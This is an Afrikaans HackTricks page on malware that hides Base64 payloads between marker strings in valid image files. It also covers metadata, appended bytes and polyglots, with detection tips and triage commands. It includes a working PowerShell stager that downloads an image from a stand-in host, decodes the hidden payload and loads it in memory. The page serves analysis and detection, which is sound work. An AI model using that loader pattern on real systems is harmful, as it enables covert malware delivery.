Malware & Netwerk Stego

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

Nie alle steganography is pixel LSB nie; commodity malware verberg dikwels payloads binne andersins geldige lêers.

Praktiese patrone

Merker-geskeide payloads in geldige beelde

As ’n beeld afgelaai en onmiddellik as text/Base64 deur ’n script gepars word, is die payload dikwels merker-geskei eerder as pixel-verborg.

Commodity loaders verberg toenemend Base64 payloads as plain text binne andersins geldige beelde (dikwels GIF/PNG). In plaas van pixel-level LSB, word die payload deur unieke merker-strings wat in die lêerteks/metadata ingebed is, afgebaken. ’n Stager doen dan:

  • Laai die beeld oor HTTP(S) af
  • Vind begin-/eind-merkers
  • Haal die tussenliggende teks uit en Base64-dekodeer dit
  • Laai/voer in-memory uit

Minimale PowerShell carving snippet:

$img = (New-Object Net.WebClient).DownloadString('https://example.com/p.gif')
$start = '<<sudo_png>>'; $end = '<<sudo_odt>>'
$s = $img.IndexOf($start); $e = $img.IndexOf($end)
if($s -ge 0 -and $e -gt $s){
$b64 = $img.Substring($s + $start.Length, $e - ($s + $start.Length))
$bytes = [Convert]::FromBase64String($b64)
[Reflection.Assembly]::Load($bytes) | Out-Null
}

Aantekeninge:

  • ATT&CK: T1027.003 (steganography)
  • Opsporing/jag:
    • Skandeer afgelaaide beelde vir delimiter strings.
    • Merk skripte wat beelde haal en onmiddellik Base64-dekoderingroetines aanroep (PowerShell FromBase64String, JS atob, ens.).
    • Soek na HTTP content-type-onversoenbaarhede (image/* response maar body bevat lang ASCII/Base64).

Ander hoë-sein plekke om payloads te verberg

Hierdie is gewoonlik vinniger om te kontroleer as content-level pixel stego:

  • Metadata: EXIF/XMP/IPTC, PNG tEXt/iTXt/zTXt, JPEG COM/APPn segmenter.
  • Aanhangende bytes: data wat aangeheg is ná die formele eindmerk (bv. na PNG IEND).
  • Ingebedde argiewe: ’n ZIP/7z ingebed of aangeheg en deur die loader uitgepak.
  • Polyglots: lêers wat gemaak is om geldig te wees onder verskeie parsers (bv. image + script + archive).

Opdragte vir triasering

file sample
exiftool -a -u -g1 sample
strings -n 8 sample | head
binwalk sample
binwalk -e sample

Verwysings:

  • Unit 42 voorbeeld: https://unit42.paloaltonetworks.com/phantomvai-loader-delivers-infostealers/
  • MITRE ATT&CK: https://attack.mitre.org/techniques/T1027/003/
  • Lêerformaat-polyglotte en houertrieke: https://github.com/corkami/docs
  • Aperi’Solve (webgebaseerde stego triage): https://aperisolve.com/

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks